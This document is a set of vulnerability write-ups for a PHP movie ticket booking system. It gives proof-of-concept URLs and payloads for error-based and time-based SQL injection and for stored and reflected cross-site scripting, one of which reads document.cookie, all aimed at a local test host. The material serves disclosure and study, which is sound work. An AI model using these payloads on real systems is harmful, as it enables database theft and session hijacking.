Building environment：Apache2.4.49；MySQL5.7.26；PHP7.3.4

1.Movie Ticket Booking System-PHP SQL injection vulnerability exists

In Booking Php, from line 4 to line 12 of the code，the value of id is passed to the backend through the get request, and is assigned to the variable $id, then $id is substituted into the database for query, and the value is assigned to the variable $movieQuery, and then the query result mysqli is returned_ query, SQL error injection vulnerability

POC：

http://vulcinema.test/booking.php?id=3%20or%20(select%201%20from%20(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

Building environment：Apache2.4.49；MySQL5.7.26；PHP7.3.4

Movie Ticket Booking System-PHP-There is a storage XSS vulnerability

At editBooking In PHP, from the 63rd line of code to the 70th line of code, the content entered by the user is directly stored in the database without filtering, and then displayed and processed in view.php, and then viewed In PHP, from line 91 to line 101, the content input by the front end is directly output without any tag closing

POC:

ace<script>alert(document.cookie)</script>

Building environment：Apache2.4.49；MySQL5.7.26；PHP7.3.4

1.Movie Ticket Booking System-PHP XSS vulnerability

inTxnStatus. Php, code line 17: ORDER_ The variable $ORDER whose ID is input by the user and assigned through POST request_ The ID is then directly output in line 44 of the code. Value="">There is no filtering. That is to say, we can construct a closed javascript statement to pop up the page. However, we can bypass the character limit at the front end, which is very simple

$ORDER_ID = $_POST["ORDER_ID"];

<td><input id="ORDER_ID" tabindex="1" maxlength="20" size="20" name="ORDER_ID" autocomplete="off" value="<?php echo $ORDER_ID ?>">

PAYLOAD:

"><script>alert("ace")</script>

Then check the website source code:

<td><input id="ORDER_ID" tabindex="1" maxlength="20" size="20" name="ORDER_ID" autocomplete="off" value=""><script>alert("ace")</script>">

Building environment：Apache2.4.49；MySQL5.7.26；PHP7.3.4

1.Movie Ticket Booking System-PHP XSS vulnerability

There is an XSS vulnerability in Booking In PHP, at line 111, we can see that the value is equal to the value of the variable $id, and the $id controllable variable is determined by user input and output directly. At this time, we can construct a closed XSS statement. The payload is "><script>alert (" ace ")</script>, and then we can construct a pop-up window

<input type="hidden" name="movie_id" value="<?php echo $id; ?>">

POC:

http://vulcinema.test/booking.php?id=5%22%3E%3Cscript%3Ealert(%22ace%22)%3C/script%3E

Building environment：Apache2.4.49；MySQL5.7.26；PHP7.3.4

1.Movie Ticket Booking System-PHP SQL injection vulnerability exists

At editBooking In PHP, in lines 30-38 of the code, the parameters requested by the front-end POST include first, last, number, email, and amount, while the variable $id is controllable. In lines 17-19 of the code, it is directly substituted into the database for query. In line 38 of the code, a SQL injection vulnerability is generated at $id

• SQL injection delay 5 seconds

• SQL injection delay 10 seconds

POC：

http://vulcinema.test/admin/editBooking.php?id=71%27%20and%20(select(sleep(10)))--%20ace
http://vulcinema.test/admin/editBooking.php?id=71%27%20and%20(select(sleep(5)))--%20ace